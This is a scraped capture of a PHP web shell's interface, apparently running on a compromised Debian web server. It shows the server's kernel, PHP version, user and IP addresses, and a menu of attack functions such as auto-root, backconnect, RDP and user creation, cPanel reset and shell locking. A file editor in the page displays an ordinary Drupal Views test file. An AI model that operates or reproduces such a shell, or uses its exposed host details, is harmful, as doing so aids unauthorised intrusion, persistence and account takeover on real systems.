Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.223.238.38
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
tests /
comment /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_comment...
3.89
KB
-rw-r--r--
views_handler_filter_comment_u...
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_filter_comment_user_uid.test
<?php /** * @file * Definition of viewsHandlerFilterCommentUserUidTest. */ /** * Tests the filter_comment_user_uid handler. * * The actual stuff is done in the parent class. */ class viewsHandlerFilterCommentUserUidTest extends viewsHandlerArgumentCommentUserUidTest { public static function getInfo() { return array( 'name' => 'Tests handler filter_comment_user_uid', 'description' => 'Tests the user posted or commented filter handler', 'group' => 'Views Modules', ); } /** * Override the view from the argument test case to remove the argument and * add filter with the uid as the value. */ function view_comment_user_uid() { $view = parent::view_comment_user_uid(); // Remove the argument. $view->set_item('default', 'argument', 'uid_touch', NULL); $options = array( 'id' => 'uid_touch', 'table' => 'node', 'field' => 'uid_touch', 'value' => array($this->loggedInUser->uid), ); $view->add_item('default', 'filter', 'node', 'uid_touch', $options); return $view; } }
Close